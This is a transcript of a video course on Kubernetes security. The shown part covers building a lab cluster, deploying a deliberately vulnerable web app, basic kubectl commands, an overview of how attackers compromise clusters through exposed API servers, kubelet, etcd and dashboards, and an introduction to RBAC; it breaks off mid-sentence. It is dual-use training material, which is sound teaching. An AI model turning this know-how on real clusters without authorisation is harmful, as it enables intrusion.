Kubernetes is becoming the de facto standard for container orchestration. A lot of big players in the IT industry are using containers, and thus the use of container orchestration tools like Kubernetes in such organizations is inevitable. Because of the complexity involved in Kubernetes, many people think that Kubernetes security is hard to learn. It's not. This course is the proof. In this course, we are going to discuss a lot of different Kubernetes security concepts along with a handful of practical exercises. We will begin this course by discussing some basic Kubernetes concepts and talk about the architecture of the system that we are going to build. That means we are going to set up our own cluster from scratch and learn how to deploy a vulnerable microservices-based application into the cluster. We will learn how various misconfigurations can occur in Kubernetes clusters by wearing an administrator's hat. And then we will also assess the security of the cluster by wearing an attacker's hat. Finally, we will learn some of the best practices to protect our clusters. Upon completing this course, students will have a solid understanding of various Kubernetes security concepts. What is Kubernetes? According to the Kubernetes documentation, Kubernetes is a portable, extensible, open source platform for managing containerized workloads and services that facilitates both declarative configuration and automation. Most importantly, it's an open source project by Google. In simple words, you will see Kubernetes in action when you have containerized workloads. When you want to manage or orchestrate the container workloads, you will need some orchestration tool. Kubernetes does exactly that. It can be used for service discovery and load balancing. For instance, if we deploy a containerized application using Kubernetes, we can use the inbuilt support of DNS to be able to interact between containers. Similarly, if a container is experiencing high traffic, Kubernetes can automatically load balance and distribute the network traffic. Another use case of Kubernetes is automated rollouts and rollbacks. Let's assume that you want to make a minor change to your application. Now you have made the change. Now we can use Kubernetes to deploy this new feature with zero downtime. Now let's assume that you don't want this change anymore. You want to roll back. That also can be very easily done using Kubernetes. Self-healing is another important feature of Kubernetes. For instance, let's assume that there is a container that has failed. Now Kubernetes can automatically restart these failed containers. These are some of the great features of Kubernetes. Since this is a security-focused course, we are not going to dive deep into the functional areas of Kubernetes. But we are going to see how containerized applications can be deployed in Kubernetes because that is essential to understand the Kubernetes security concepts. Welcome to the module Fundamentals of Kubernetes. In this module, we will first discuss how to set up the lab to follow the hands-on exercises in this course. And then we will discuss some of the core concepts of Kubernetes. So this basic knowledge is going to be useful in the remaining modules of the course. So let's get started with the lab setup in the next video. Welcome back to another video. As I mentioned earlier, this course is going to be extremely hands-on and we are going to do a lot of lab exercises. So it is essential that you have a lab setup to be able to practice the concepts that we discuss in the course. So let's discuss what it takes to have the lab set up locally in your laptop to be able to follow all the hands-on exercises. First, we need to have VirtualBox. This is the software that I'm going to use throughout the course to install all the virtual machines. But if you prefer another virtualization software, that's fine as well. Within VirtualBox, we are going to require 3 virtual machines. One, Kali Linux, which is going to act as an attacking machine, and we are going to need 2 Ubuntu virtual machines. We are going to use these 2 Ubuntu virtual machines to form a Kubernetes cluster. The first Ubuntu virtual machine is going to act as master node, and the second one is going to act as a worker node. It is important to know the specs that are required to have a decent lab setup to follow the course. First, the master node requires at least 3 GB of RAM and it requires 2 CPU cores. I'm going to show how to configure these settings in VirtualBox later. And the second virtual machine, the worker node, it also requires 3 GB of RAM. And the attacking machine also requires 2 GB of RAM. So essentially, your machine should be powerful enough to handle this lab. If you don't have a laptop that supports this kind of lab, you can also choose to go to a cloud provider and use some virtual machines from there. All we are going to do is we are going to connect these 3 virtual machines in a network. All right, with that, let me quickly show you where you can download these virtual machines from. First, let's search for Ubuntu 2004 desktop ISO image. We are going to require a desktop image. So this is the image that you need to download and install in your VirtualBox. Remember, we need to have 2 instances of these machines. I'm going to show my setup in the next video so you can simulate the same setup. Next, we need to download Kali Linux ISO image. So let's search for Kali Linux. Kali Linux 64-bit installer. I'm going to use this image to install Kali Linux virtual machine in my setup. Alright, go ahead and download these ISO images. In the next video, I'm going to show you my setup so you can simulate the same setup in your laptops. Welcome back. I hope you have downloaded Ubuntu 2004 and Kali Linux ISO images. Now, let me quickly show my setup and let's also configure these specs in the lab. I'm switching to the VirtualBox. The first one, Kali Linux. Kali Linux requires 2 gigs of RAM. Let's go to System and make sure that 2048 MB is shown here. That means we have given it 2 gigs of RAM. Alright, so that's that simple. And let's also go to the master node and let's go to Settings, System, and this master node requires 3 gigs of RAM at a minimum. So I have given 3072 MB here. And let's also go to the processor tab and let's make sure that we are giving it 2 CPU cores, right? And let's click OK. And let's go to the worker node and let's go to the settings and let's navigate to System and let's make sure that we are giving it 3 GB of RAM. That's it. So that's the basic setup I have, and these virtual machines are still fresh. I haven't installed anything inside. Just in case if you want to follow the same naming notation as me, my Kali Linux machine has the host name Kali, my master node has the host name master, and my worker 1 has the host name worker 1. This is the naming convention that I have followed in my lab, and if you want to follow the same convention, go ahead and do that. So go ahead and install these 3 virtual machines and we will do the Kubernetes lab setup in the next video. In this video, we are going to set up a Kubernetes cluster using the virtual machines that we have installed earlier. So let's switch to the VirtualBox and let's first make sure that all the virtual machines are connected in bridged mode. So I'm going to Settings, Network, and change this to Bridged Adapter. You can actually use any other network settings. The only requirement is that each VM should have internet and it should be able to talk to other VMs in the network. So I'm choosing Bridged Adapter, click OK. Let's do the same with the remaining virtual machines as well. Alright, so all the machines are now connected in bridged mode. Now let's start master and worker 1 VMs. We don't need Kali Linux at the moment, so let's only start the master node and worker node. I'm logging into the master node. Let's also log into the worker node. Now let's verify the IP addresses of both the virtual machines. I'm going to open terminal and let's add this to favorites so we can easily access this terminal every time we need it. All right, let's open it up and let's type ifconfig. It's usually not pre-installed. I just want to show you that I haven't installed anything yet. So it's basically a fresh installation with no tools installed. So let's install net tools so we will be able to access ifconfig command. Let's do that also on the master node. I'm adding this terminal to favorites. So let's open it up and let's type ifconfig. It's not pre-installed, so let's just type this command to install ifconfig. All right, so once this is done, we should be able to check the IP addresses of both the machines. Let's check the IP address in master node by typing ifconfig. As you can see, the IP address here is 192.168.1.102. Now let's also check the IP address in the worker node. Okay, this is 1.105. So we should be able to ping each other. There you go. So these two are in a network. Now we will have to install all the prerequisites to be able to set up a Kubernetes cluster. To begin with, let's do a apt update on both the virtual machines. Sudo apt update -y. Let's do this also on the worker node. All right, so on the master node, it is done. Now let's install Docker. It can be done by typing sudo apt install docker.io -y, hit enter. And let's do the same even on the worker node. Sudo apt install docker.io -y. So this command is going to install Docker on both the virtual machines for us. With that, the Docker installation is complete. Let's quickly type sudo systemctl enable Docker. All right, now let's also do that on the worker node. Okay, so this is done. Now let's move back to the master node and let's also install curl. Sudo apt install curl sudo apt install curl. So I'm installing it both on the master node and the worker node. All right, so curl is installed. Now we need to install a couple of Kubernetes specific utilities such as kubeadm and kubectl. To do that, we will first need to add a GPG key from Google Cloud. After that, we will have to add a repository, and with that, we should be able to download these utilities. I have added all the commands that are required to do this setup into a shell script. So all I'm going to do is I'm going to run this shell script so it will automatically install Kubernetes specific utilities for us. All right, so let's type sudo sh and the file name and hit enter. And this should download everything that we need to start with the Kubernetes setup. All right, the installation is complete. Now let's also do the same setup in the worker node. Sudo sh and the file name and hit enter. All right, the installation is now complete. Now we should have kubectl, kubeadm, and Kubernetes CNI along with kubelet. With this, we are now ready to set up a Kubernetes cluster. We are going to use kubeadm utility to set up the cluster. It is very convenient to have a local setup using kubeadm, especially this kind of setup where we are practicing a lot of different attacks using a multi-node cluster. So I'm going to run kubeadm. Let's first find out the IP address of the master node, and let's type this command, and let's replace this advertise address with 192.168.1.102. So this is going to be the master IP address. All right, that seems fine. So now let's hit enter. If you see, there are a bunch of pre-flight checks that are being run, and we failed a swap check. So running with swap on is not supported, so please disable it. Okay, so let's do that. Sudo swap off -a. That should do it. Let's also do that on the worker node. Sudo swap off -a. And now we should be able to initiate the cluster. So let's run this kubeadm command once again. And hopefully we should be able to start the Kubernetes cluster setup. So this command is going to pull a lot of images, and it's going to do a bit of configuration for us. So be prepared to wait for a while. Nice, we have now successfully initialized the control plane, which is on the master node, right? So as you can see in the output, we still have to run few more commands to complete the setup. Now let's copy this first one. If you notice, we need to run this as a regular user. So I'm just pasting it here. And we should also run this one. I'm running this here. And let's copy and paste the last command. All right, so with this, we are done with pretty much everything, but there is one last step that we are missing. That is setting up a networking plugin. There are multiple options here. We can use Flannel or Calico. I'm going to go with Flannel to start with. So let's proceed to deploy Flannel plugin. I'm typing kubectl apply and the location of this Flannel YAML file and hitting enter. It looks like kubectl is unable to find the config file, so we can just specify it manually using the command line kubeconfig, and this is the location. So let's just copy this and paste it here, hit enter. And if you see this, the Flannel plugin is successfully deployed. Now all we have to do is give this particular command to worker nodes, and if you run them there, the worker node should be able to join this cluster. So let's copy this and let's paste it in the worker node. I'm pasting it here and hit enter. If you see this, there is an error. That's because we are not running this as sudo. Let's paste the command once again and hit enter. And hopefully we should be able to join the cluster. Okay, if you see this, it says the node has joined the cluster. So just to confirm that this node has been joined in the cluster, let's go to the master node and type kubectl get nodes. And if you see, currently there are two nodes. One is the master node, which is ready, and the status of worker node is currently set to not ready because we just joined. So it may take a bit of time to change the status to ready. So let's try it again. Look at that. If you see this, the worker node is also ready, and we are pretty much done with completing the Kubernetes cluster setup. So we have successfully set up a Kubernetes cluster, and we have a master node and a worker node. You can now join as many nodes as you want just by running the command that we have run just now in the worker node. With this, our Kubernetes cluster setup is complete. In the next couple of videos, we are going to understand some basics of Kubernetes concepts and introduce some misconfigurations and vulnerabilities into this cluster. Now that we have installed a Kubernetes cluster in our local setup, just make sure that it is working fine before we move on to the other topics. Verify that each node has enough RAM so the virtual machines will not freeze and you will be able to access everything right through the cores. Also verify that the master node is given 2 CPU cores. Finally, make sure that your Kubernetes cluster is working fine. Verify that for one last time by running the utility kubectl or kubecontrol. You can probably run the command kubectl get nodes. If everything is fine, we are in a good position to move on to the next topics. Let's begin with understanding some commonly used jargon in Kubernetes. It is extremely important that we understand these common terms before we jump into attacking Kubernetes clusters. So let's begin with cluster. Cluster is what we have built. It contains multiple nodes, usually one master node and one or more worker nodes in a multi-node setup. Each master node or control plane will have few more components like API server. We will discuss those in a moment. And each worker node is going to be used to deploy pods. It is worth noting that typically master nodes may not be used to deploy workloads. Only worker nodes will be used for this purpose, and master node will be used only for having the control plane components. In simple words, it means your actual applications will be deployed on the worker nodes, not on the master node. So each worker node will have pods. Pod is the smallest unit in a Kubernetes cluster. Each pod may have one or more containers wrapped inside it. So if you look at the picture, the whole setup here is the cluster, and this cluster has one master node and a bunch of worker nodes. And the master node is running some pods. So these pods do not necessarily be the applications that you're running. They can also be the control plane components. And each worker node will have the application specific pods, which are denoted by the white colored circles here. And then each pod may have one or more containers wrapped inside. So in this case, only one container is wrapped in each pod, but it is possible that each pod can contain more than one container. So as I mentioned, cluster is the complete setup we have. Node is a single machine that contains your actual applications, which are usually run inside the pods. But for the node to be able to run the pods, it also needs some more additional components. If you remember, we installed Kubelet and Docker on the worker node as well. And we have namespace. Namespaces are logical grouping of Kubernetes objects. We can refer to them as virtual clusters backed by the physical cluster. We are going to see some examples of creating namespaces later. And then we have the pod. As I mentioned earlier, pod is the smallest unit of work. It can have one or more containers. We are going to deploy some pods into the Kubernetes cluster we have created, and we are going to interact with them in later videos. And we have container. Container is running instance of an image. All the applications that we are going to run are going to be Docker images. We are going to pull Docker images from Docker Hub or some other registry, and we are going to run them as containers. If you are familiar with Docker concepts, basically it is the same. Now, the next one is service. Service acts as a load balancer.
Let's assume that we have 4 pods running in the cluster with the same application. Now, if you want to load balance among these 4 pods, we can use a service. It essentially redirects traffic to pods with a specific matching label. We are going to use all of these concepts that are shown on the slide in this course. If something sounds complex at the moment, don't worry, you will be able to understand them by the time you finish the course. And the next one is deployment. All the pods are the basic unit of computation in Kubernetes. They are not typically directly launched on a cluster. We can do it. We can create a YAML file specifying that we want to deploy a pod. That's possible, but typically that's not done. We typically use deployments to launch pods. The primary purpose of a deployment is to declare how many replicas of a pod should be running at any point of time. Let's assume that the application should not have any downtime, and it should always be having 40 pods running at any given point of time. That can be specified in a deployment. You can just create a Docker image and you can create a deployment specifying that I need 40 different replicas of this particular image. It's possible using deployment. Now, using deployment, we don't have to deal with pods manually. We can just declare the desired state of the system and it will be managed for us automatically. We are going to use deployments and services when we are going to deploy our vulnerable application in the cluster. With that, I have one last thing pending before we end this video. That is a pictorial representation of service. If you see this picture, there are multiple pods running with a same label, and there is a service running here. So whenever a service is deployed using a specific label, that service will act as a load balancer to all the pods that are running with the same label. For instance, there is a login API running in this pod. Now we can just simply name it as login, and let's assume that there are a few more copies of the same API running, and we should always give them the same label name. So the service will be able to identify what to load balance. We have just created a simple Kubernetes cluster. Now, even though it looks pretty simple from outside, the cluster that we have created contains multiple components both in the master node as well as in the worker node. Now, let's quickly understand what the master node contains and what the worker node contains. This slide shows the complete architecture of our lab setup. We have an attacking machine, and we have a Kubernetes cluster running here with a master node and a worker node. And an attacker can actually access a vulnerable web application by accessing an exposed service. This service is basically a load balancer for these 2 pods, which are running a web UI. And each of these web UI pods will in turn communicate with another service, which is going to act as a load balancer to different REST APIs that are running inside pods. Now, we haven't deployed this application yet. We are going to deploy this microservices based application into the cluster that we have created earlier, and then we will revisit this slide after that. For now, the focus is to understand the components of the master node as well as the worker node. If you look at the figure, the master node or the control plane comes with few different components: API server, scheduler, controller manager, and etcd. Now, I may not have listed everything. I'm only highlighting some of the key components in a master node. Now, if you look at the worker node, we have Kubelet and Kubeproxy. Now, these are some of the most important components that we need to know about. So let's quickly understand what each of these components do. The API server on the master node provides a REST API for controlling Kubernetes. When we ran kubectl or kubectl commands like kubectl get nodes, we are actually interacting with the API server in the backend. It is also possible that we can interact with this API server over HTTP. So it means we have 2 ways of interacting with API server. One way is to use the command line tool kubectl, and the other way is to use the HTTP API. And then we have scheduler. Scheduler is something that is used when we create new pods. When we try to launch new pods in a cluster, scheduler's job is to make sure that it finds the best node for that pod to run on. Let's assume that the code that is run inside this pod specifically requires GPU. Now, scheduler will ensure that this pod is deployed on a node which is GPU powered. So that is scheduler. And the next one is controller manager. Controller manager is a daemon that embeds the core control loops shipped with Kubernetes. Now, a control loop keeps watching the state of the cluster through the API server, and it makes changes attempting to move the current state of the cluster to the desired state. So that's the job of the controller manager. One example of control loop that ships with Kubernetes is replication controller to ensure that the desired number of replicas are running in the cluster. The next one is etcd. Kubernetes follows distributed architecture. It runs several machines in the cluster. In such architectures, storing the configuration data and the data about the state of the cluster is very crucial. So Kubernetes needs a distributed data store. This is where etcd comes into picture. Kubernetes uses etcd to store all the configuration data, data about the state, metadata, and if the user defines any secrets, those will also be saved in etcd. We are going to interact with etcd manually later in this course, so you will clearly understand what kind of data is stored inside etcd when we do the lab exercise. For now, just remember that etcd is a distributed data store for storing the most critical data of our Kubernetes cluster. Now let's move on to the worker node components. The first one, Kubelet. Kubelet is an agent that runs on each node. The job of Kubelet is to watch the API server for pods that are bound to its node. If any pods are assigned to the node that it is running on, it ensures that those pods are properly running on the node. And the next component is Kubeproxy. The job of Kubeproxy is to watch the API server for any changes on services and pod definitions and make sure that the entire network configuration is up to date. Essentially, it ensures that one pod can talk to another pod, one node can talk to another node, and one container can talk to another container. Besides that, another important thing that it does is exposing the services that we run by properly manipulating the IP table rules so that the services are accessible to the destined users as well as the traffic is properly redirected to the correct backend. To summarize, each node in a Kubernetes cluster comes with its own components to ensure that everything in a Kubernetes cluster is seamlessly managed. Welcome back. In this video, we are going to deploy the vulnerable application into the Kubernetes cluster that we have created earlier. Now, the first few steps are already done. We have installed Kubernetes on both master and worker nodes. We have initiated a cluster on the master node, and the worker node joined the cluster. Now, the next step is to deploy the target application. One thing we need to ensure before deploying the application is we need to look at the YAML files and the IP addresses are correctly defined in the YAML files, right? So with that, let's first understand what happens after we deploy this target application. We are going to have a setup like this. A Kali Linux machine is connected in the same network over bridged adapter, and an attacker will be able to see an exposed application like this. So essentially, we are just exposing an application. With this access, we are going to completely compromise the cluster. We will start by exploiting the application and gaining an initial foothold on a pod. From there, we will laterally move and compromise the complete cluster. So that's the goal. As an attacker, we want to compromise the complete cluster. But this is just one path that we are going to follow in the course. We are going to use the web application as an entry point, and we are going to compromise the complete cluster. But that may not give us a full picture of all the vulnerabilities or misconfigurations a Kubernetes cluster may have. So that's where we are also going to create some more misconfigurations as and when I want to show you a specific misconfiguration. For instance, let's assume that a Kubernetes dashboard is exposed and we want to abuse that.
For that, we are first going to do a vulnerable Kubernetes dashboard setup in our lab, and then we will exploit it. So this gives you an understanding of both what's causing the issue and how to exploit it. At the same time, you will also be able to understand how to fix the issue as well. So that's the way we are going to learn a lot of different concepts in this course. So without any further ado, let's go ahead and deploy the application in the cluster, and we will come back to the slides after that. On my master node, I'm navigating to desktop, and I have a folder called downloadables inside this. And inside this directory, we have a file called vuln_app_zip. Let me unzip it. Let's navigate to updated files directory. And look at that. If you notice, there are 4 different YAML files here. These files are available for download. Each of these files contain a set of instructions. But before we deploy the application into the cluster, let's quickly verify what these YAML files are doing. So the first one is api.yaml. Let's quickly take a look at that. If you look at this, the kind is specified to be a deployment. It is going to deploy some pods into the Kubernetes cluster. If you look at the spec for containers, we are downloading an image from Docker Hub. By default, Docker Hub is the registry that we are going to access. So this image is available on Docker Hub, and we are trying to pull it from Docker Hub. So essentially what it means is this machine should have internet connectivity when we do the deployment. The image pull policy is set to always. So whenever this YAML file is used to do the deployment, this image is always going to be pulled from the internet. There are a few more interesting things that are worth taking a look at in this YAML file. One of them is the ports. So we are exposing port number 80 in the container. We don't have to worry about it. We are not going to directly interact with the API. We are going to use the UI, and the UI will in turn interact with this API. So the container spec says that this API is exposed over port 80 on the container. Right. Now, another interesting part that is worth taking a look at is template. If you look at this template, there is a label called API. If you remember, we were talking about services and load balancing. And we also mentioned that each pod should have a label so that the service can identify what to load balance. So this is exactly what is going to help the services to identify this API pod. So we are going to use this label name as API. Whenever we hit the service will look for this label and it will try to do the load balancing for us. Another thing that to note is the replicas. If you look at this, the moment you do the deployment, 2 pods will be created because the replicas is set to 2. And the strategy is also set to rolling update, and max unavailable is set to 1 and max surge is set to 1. Basically, this strategy ensures that the pods are available at any given point of time without any downtime. So that's api.yaml. Now let's also look at the other files we have. The next file that I want to take a look at is api service.yaml. So let's quickly take a look at that. If you look at this is a very simple file. There is nothing much. The kind is set to service. So the YAML file says that it is a service. That means it is going to load balance something. What is that something? That will be specified using the selector. This service is going to load balance the pods that are labeled as API. And the spec says that this service is available on port 80 and the target port is also 80. So what it means is this is exposed over port 80 and it also tries to contact the target API using the port 80. Right, that's as simple as that. Now let's take a look at the webapp.yaml. This is very similar to the api.yaml. If you look at this is a deployment and we have 2 replicas defined, and the strategy is the same as api.yaml, and the spec says that we are downloading an image called hacking Kubernetes /webapp, and the pull policy is also set to always, just like API.yaml. And the name of this container is going to be web app, and the port that we are exposing in the container is 80. Now, there is only one additional thing that we did not have in API.yaml, that is the environment variable. If you look at this, we are creating an environment variable called API_URL, and we have given it a value, which is this in this case. So essentially, we are using Kubernetes DNS to be able to identify the API pod just by using its name. If you look at this, this is going to be used in this pod to interact with the pod that runs the API. And these two pods will basically interact just by using the name, not by specifying the IP address. So regardless of where that pod is running, as long as the web UI pod and the API pod are running in the same network, they will be able to communicate with each other using DNS. All right, so that is webapp.yaml. Now we are left with one last YAML file, that is webapp service.yaml. There is one additional thing we have here. That is, the spec says this is node port. Node port is used when we want to expose the service over some IP addresses. In this case, if you look at this, the external IPs are specified to be 192.168.1.102 and 192.168.1.105. So what it means is I'm exposing this service on both the master node as well as on the worker node. So if I try to access the IP address of the master node, this service will be available. This service will be available even if I access the IP address of the worker node. Even though this application is not going to be deployed on the master node, we will be able to access the application by using the IP address of the master node. So that's how node port is used. And the rest of the options are same as API service.yaml. We have ports defined here. So basically we can access the IP address over port 80, and it is going to access the pods that are created using webapp.yaml on port 80 because a selector web app is defined here. So in short, you will have to update this webapp service.yaml file because your IP addresses may be different. So you will have to update this section with your own IP addresses of master node and worker nodes. So let's summarize these four files. We have API.yaml, which is going to deploy two pods, and we have API service.yaml, which is going to act as a load balancer for these two pods. After that, we are deploying webapp.yaml, which will create two UI pods, and the pods that are created using this webapp.yaml will communicate with this load balancer. So essentially, when this application tries to access the load balancer, it will redirect the traffic to the API pods. So that's what is going to happen after we deploy webapp.yaml. But we want to be able to access the web application UI in the first place. So we created another service which is going to act as a load balancer to the web application UI. To better understand this, let's quickly switch back to the slides and take a look at our architecture diagram. If you look at this diagram, from Kali Linux, we are going to access a service. So this is what is created using webapp-service.yaml. When we try to access this, it will take us to one of these two pods, which is created using webapp.yaml. After that, this webapp.yaml is going to communicate with a service which is created using api-service.yaml. And once we are there, it is a load balancer for the API pods. So our request will be forwarded to one of these pods. Right, so that's the application that we are going to deploy now. So let's once again switch back to the master node and deploy this microservices-based application. Deploying it is as simple as running kubectl, apply, and specify the file name using -f. So let's begin with api.yaml. That's done. Let's also do the same with the remaining YAML files. kubectl, API service,
kubectl apply -f webapp.yaml. Kubectl apply -f webapp service.yaml. All right, if you see, all of them are showing the message created. So we should have this application running. Now let's quickly open up a browser and try to access the IP addresses of both the master node as well as the worker node. The IP address of master node is 192.168.1.102. And if you look at this, the application is accessible here. Now let's also try to access 105, which is the IP address of the worker node. Look at that. The application is accessible using both the IP addresses that are specified under node port of the webapp service.yaml file. Now, if you see the application, it is a very simple base64 encode decode service. The decode feature is not available in the application. It only does the encoding. So let's try to enter some test string. And look at that. The output actually gives us a base64 encoded version of the string that we have inserted. So that's the functionality of the application. That's it. It's a very simple application. It just takes some input and provides us with the base64 encoded version of the text that we have inserted. Congratulations if you have deployed an application into a Kubernetes cluster for the first time. Right. So that's all for this video. In the next couple of videos, we are going to discuss some more fundamental concepts which can be useful in the subsequent modules. In the previous video, we have seen how kubectl can be used to deploy our application. Now let's go through some more kubectl commands that can be useful for an administrator as well as an attacker. Some people call it kubectl and some people call it kubectl, and I'm using both of them with no preference, right? So don't get confused when I say kubectl or kubectl, it's basically the same. Now, these are some of the common things that we can do with kubectl command line utility. We can list the pods that we have in the cluster. We can list the nodes we have in the cluster. We can list the services we have in the cluster, and we can view the configurations. We can create pods. We can create deployments. We can create services. And we can even use kubectl to get a shell on a running pod. Now we are going to do a very simple lab exercise, which is going to give you hands-on experience with all of these. So let's switch to the master node. And let's begin with getting the list of nodes we have in the cluster. We have already done that earlier, but let's do that once again. Kubectl get nodes. As you can see from the output, we have two nodes in this cluster. One is master, the other one is worker one, and the status of both of them is ready. Now, as we have seen earlier, we can also deploy pods and services like we did earlier in the previous video. We can just use kubectl apply -f, and we can use the name of the YAML file. That simply creates a pod, a service, a deployment, depending on the YAML file that we have created. I have a file called malicious.yaml on my desktop. This file, malicious.yaml, is available for download. So you can also create the pod like I'm doing here. Let's first examine this file, malicious.yaml. If you look at this, the kind is set to pod. So when we deploy this, it is basically going to create a pod in this cluster. So let's do that. Kubectl apply -f malicious.yaml. If you look at that, it says the pod has been created. Now let's use kubectl to get the list of pods running in this cluster. Kubectl get pods. And if you see this, there are 5 pods running here. 2 web application pods, 2 API pods, and 1 pod that we just created. Now the reason why I have created an additional pod is to show you
how we can actually delete the pod. So let's try to delete it by typing kubectl delete, and we will have to specify the exact same YAML file that we have used to create this pod. So in this case, it becomes malicious.yaml, and hit enter, and the pod named attacker would be deleted. So let's check that once again by typing kubectl get pods. If you look at that, the output doesn't have the pod named attacker anymore. Right, so that's how we can use kubectl to create pods and to delete pods. Now, it is also possible for us to use the kubectl get pods command with some other parameters. For instance, I'm using -o wide. So we will have more details. If you look at this, it is showing what is the IP address of this pod and which node it is running on. So that's interesting. So we can use this additional flag to have more details in the output. Next, let's add one more parameter called -v8. If you look at the output, we are basically listing the pods, but along with the pods, we are basically getting some verbose information, such as what HTTP request is used by kubectl to retrieve this information. If you look at the user agent, it is kubectl with some version. So essentially, kubectl is basically making some HTTP connection to the API server on this particular URL. So what this means is it is also possible to list these pods by accessing this URL from the browser. However, in this case, we won't be able to do that because it requires certificate-based authentication. But we can give it a try. Okay, so if you look at this, access is forbidden to anonymous users. So basically, without providing any authentication, we are trying to access this URL, and that is not allowed. So that is how we can use kubectl get pods with more options. Now let's try to list the services that are available in this cluster. That can be done by typing kubectl get services. And if you look at this, there are 3 services running here. One is API, the other one is Kubernetes and WebLB. API and WebLB are what we have created. We can also see the external IPs that are exposing these services. If you look at this, WebLB is the service that we have created, and under node port, we have specified these IP addresses as the external IP addresses, and that's why we are seeing them here. We can also see the configuration information from this cluster. That can be done by using kubectl config view. If you look at this, the API server is running here, and there is some certificate-based authentication required, and the details are redacted. This is how we can also view the configuration information using kubectl. Now, the next one is viewing logs from a specific pod. First, let's get the list of pods once again by using kubectl get pods. And let's copy the name of one of the pods and type kubectl logs, and let's just give the name of the pod. And if you look at this, these are the logs from the container. Now let's also try to view the logs of the web app. I'm just copying the pod name, and let's just paste it here, and there you go. If you look at this, there are some logs from Apache server within this container. So that's how we can view the logs of a specific pod if we want to do any troubleshooting. Now let's see how we can use kubectl to get a shell on a specific pod. Let's once again try to get the list of pods by typing kubectl get pods, and let's try to get a shell on one of these pods. I'm copying this and kubectl exec -it, and let's specify the name of the pod and the command that we want to run. In this case, I want to get an interactive shell, so I'm typing binsh. There you go. If you look at this, we have a Docker file inside, we have a file called api.py, and we have a file called requirements.txt. So this is kubectl in a nutshell. We can use this for many other things. You can simply type kubectl help to see the list of things that we can do with kubectl, but I have pretty much covered everything that we need in this course. Welcome to the module Hacking Kubernetes Clusters. This is going to be an interesting module. We are going to begin this module by understanding Kubernetes attack surface, and then we are going to exploit the application that we have set up earlier to gain initial foothold on the cluster. After that, we are going to fully compromise the cluster using the initial foothold we have gotten. We are also going to see a lot of different types of attacks in this module, such as exploiting misconfigured API server, exploiting misconfigured Kubelet API, exploiting etcd storage, and exploiting exposed Kubernetes dashboards. On top of all of this, we are also going to learn some enumeration techniques that can be useful during post-exploitation. Alright, so that's what this module is all about. Now let's talk about Kubernetes attack surface. Kubernetes clusters have a lot of different components to manage. Since it is a complex distributed system, it is highly likely that people make mistakes when dealing with Kubernetes clusters. Now, to simplify the attack surface, there are three high-level categories that we are going to discuss. One, external attackers. Let's quickly take a look at the architecture diagram that we have, and let's see what external attacks mean to us. If you look at this architecture, there is a web application that is exposed to the outsiders. Now, an attacker who is sitting outside the cluster, being able to access this application, it is possible that he may find a vulnerability in the web app and exploit it to gain some foothold in the cluster. Now, that is one possibility, but there are a lot of different other services that are running inside the cluster. If you take Masternode as an example, it is running API server. There could be a need for this API server to be exposed to other systems outside this cluster. If this API server is misconfigured and exposed, it is possible that an attacker can make use of it to compromise the complete cluster, because API server is the heart of a Kubernetes cluster. Now, if you look at the worker node, it has Kubelet. Kubelet is the heart of the worker nodes. Kubelet also comes with an API because the API server needs to be able to talk to Kubelet. So if the Kubelet API is exposed to an attacker, it is possible that he can get code execution on the underlying host. So that is another possibility. Another possibility is the etcd storage. It is possible for us to remotely interact with etcd storage over HTTP. If the etcd URLs are exposed, it is once again possible that an attacker can compromise sensitive data. Now, we should remember that by default, most of these settings, for instance, communication between the API server and Kubelet, or the communication between API server and etcd, all of these communications are secured with certificates. So by default, it is pretty safe. But the problem comes in when administrators make changes to these components. In the later videos, we are going to see what kind of changes will expose these services and make these vulnerable. We will also discuss how an attacker can abuse these exposed services. Right, so that is external attackers. Now let's talk about compromised containers. If you look at this architecture once again, we have a bunch of pods running in this cluster. Now, if an attacker gains a foothold on one of these pods, it is possible that he can make use of the misconfigurations or vulnerabilities within the containers to escalate the privileges to get foothold on the underlying host, which may eventually lead to a full cluster compromise. Once again, we are going to see how this can happen in later videos. And in the last module, we are also going to see some hardening techniques which can prevent such problems. Alright, so the third one is malicious insiders. If there is a malicious insider who has access to one of these systems, with admin privileges, it is possible for him to spin up some malicious containers or backdoor some of the images to gain more privileges on the cluster. For instance, let's assume that a malicious insider has the ability to create pods. It is possible that these pods can be created with more privileges, leading to cluster compromise. So these are some of the attacks that are possible against our Kubernetes cluster. We are going to discuss all of these practical attacks in the next subsequent videos. Before we start attacking the Kubernetes cluster, there is another important concept that is worth understanding. That is role-based access controls in Kubernetes. In Kubernetes, role-based access controls provide us with the ability to control what resources a user can access. We do not want every account to be an administrator account in our cluster. So when we want to apply such limitations, role-based access controls are used. A simple example is you want to provide read-only access on pods to a specific service account. In order for us to better understand this role-based access control in Kubernetes, let's understand roles, role bindings, cluster roles, and cluster role bindings. Followed by that, let's understand what are service accounts. First, let's get started with roles and role bindings. Role is applied to a specific namespace. So when we define permissions for a specific role, they can be used in a specific namespace only. Now, role binding is something that is used for binding this role to a specific account. First, we will create a role and we will bind this role to a specific account using this role binding. Remember, this is done at namespace level. Now, when it comes to cluster role, as the name indicates, it is applied to an entire cluster, not just to a namespace. Just like we do with the role, we define the permissions in a cluster role, and when we want to bind these permissions to a specific account, we will use cluster role binding. Now let's switch to the master node and examine what cluster roles we have on a default Kubernetes setup. I am switching to the virtual machine. Let's type kubectl get cluster roles and let's grep for admin. As you can see in the output, there are 4 cluster roles with the word admin in them. Now, we did not create any cluster roles manually. All of these are available on a default Kubernetes setup. Now, this is all fine. We have seen some cluster roles. For example, there is a cluster role called cluster admin. We are going to use this in this course. We are going to misconfigure this cluster by creating a service account and giving it cluster admin privileges. Now, to better understand how to create roles and cluster roles to enforce access controls, we should first understand another important concept. So let's switch to the slides. And here it is. Subjects, resources, and verbs. The subjects specify users who want to access the Kubernetes API. And the resources are the Kubernetes API objects. They could be pods, they could be nodes, they could be services. The resources are the objects that we want to access. Now the next one is verbs. So verbs are basically the operations that can be executed on the resources. For instance, let's talk about pods. On a pod, you can see the list of pods, you can create a pod, you can delete a pod. So these are some of the examples of verbs. So when we are creating a role or cluster role, we have to be clear about what operations the subject can perform on a resource. Now, this could be slightly confusing without any practical examples. So in the next video, I'm going to show you some practical examples of how to create a namespace, how to create a service account, and how we can create roles and role bindings, right? So with that, I'm going to end this video here. And in the next video, we are going to continue by understanding these concepts with practical examples. Welcome back. In the previous video, we discussed some theory about role-based access controls. we discussed roles, role bindings, cluster roles, and cluster role bindings. Now let's see these concepts in practice. To understand role-based access controls, we are going to create a role and service account, and then we are going to create a role binding to tie them together. So let's begin by creating a new namespace in our master node. So I'm switching to the virtual machine, and let's type kubectl create namespace RBAC-NS. So basically we are creating a new namespace in this cluster. Hit 